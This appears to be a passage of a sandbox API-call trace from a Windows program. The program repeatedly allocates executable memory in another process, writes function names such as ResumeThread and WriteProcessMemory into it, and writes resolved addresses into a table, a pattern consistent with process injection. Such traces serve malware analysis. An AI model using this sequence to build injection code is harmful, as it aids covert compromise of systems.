	[0187.684] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.684] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.684] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.685] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.685] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550f0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.685] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.685] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.685] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0187.685] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.685] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c6a*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c6a*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.686] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.686] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.686] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.686] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.686] ResetEvent (hEvent=0x478) returned 1
	[0187.686] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.687] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.687] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.687] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.687] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.687] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550f4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.687] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.687] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.687] lstrlenA (lpString="ResumeThread") returned 12
	[0187.688] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.688] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c5a*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c5a*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.688] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.688] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.688] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.688] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.688] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.689] ResetEvent (hEvent=0x478) returned 1
	[0187.689] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.689] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.689] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.689] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.689] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.689] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550f8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.690] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.690] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.690] lstrlenA (lpString="VirtualAlloc") returned 12
	[0187.690] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.690] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c4a*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c4a*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.690] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.690] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.690] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.691] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.691] ResetEvent (hEvent=0x478) returned 1
	[0187.691] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.691] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.691] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.691] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.691] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.691] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100550fc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.692] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.692] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.692] lstrlenA (lpString="VirtualFree") returned 11
	[0187.692] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.692] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c3c*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c3c*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.693] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.693] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.693] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.693] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.693] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.693] ResetEvent (hEvent=0x478) returned 1
	[0187.693] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.694] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.694] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.694] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.694] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.694] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055100, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.694] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.694] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.694] lstrlenA (lpString="SetLastError") returned 12
	[0187.694] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.695] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c2c*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c2c*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.695] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.695] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.695] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.695] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.695] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.696] ResetEvent (hEvent=0x478) returned 1
	[0187.696] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.696] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.696] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.696] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.696] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.696] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055104, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.696] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.697] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.697] lstrlenA (lpString="WriteProcessMemory") returned 18
	[0187.697] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.697] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c16*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c16*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0187.697] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.697] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.697] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.697] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.698] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.698] ResetEvent (hEvent=0x478) returned 1
	[0187.698] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.698] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.698] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.698] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.698] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.698] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055108, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.699] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.699] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.699] lstrlenA (lpString="HeapReAlloc") returned 11
	[0187.699] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.699] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6c08*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6c08*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.699] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.699] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.699] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.705] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.706] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.706] ResetEvent (hEvent=0x478) returned 1
	[0187.706] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.706] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.707] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.707] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.707] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.707] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005510c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.707] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.707] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.707] lstrlenA (lpString="ExitProcess") returned 11
	[0187.707] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.707] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6bfa*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6bfa*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.708] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.708] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.708] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.708] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.709] ResetEvent (hEvent=0x478) returned 1
	[0187.709] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.709] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.709] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.709] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.709] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.709] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055110, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.709] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.710] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.710] lstrlenA (lpString="CreateFileW") returned 11
	[0187.710] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.710] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7730*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7730*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.710] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.710] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.710] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.711] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.711] ResetEvent (hEvent=0x478) returned 1
	[0187.711] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.711] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.711] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.711] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.711] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.711] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055114, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.712] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.712] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.712] lstrlenA (lpString="DecodePointer") returned 13
	[0187.712] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.712] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7720*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7720*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.712] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.712] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.713] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.713] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.713] ResetEvent (hEvent=0x478) returned 1
	[0187.713] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.713] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.713] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.714] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.714] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.714] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055118, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.714] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.714] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.714] lstrlenA (lpString="SetFilePointerEx") returned 16
	[0187.714] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
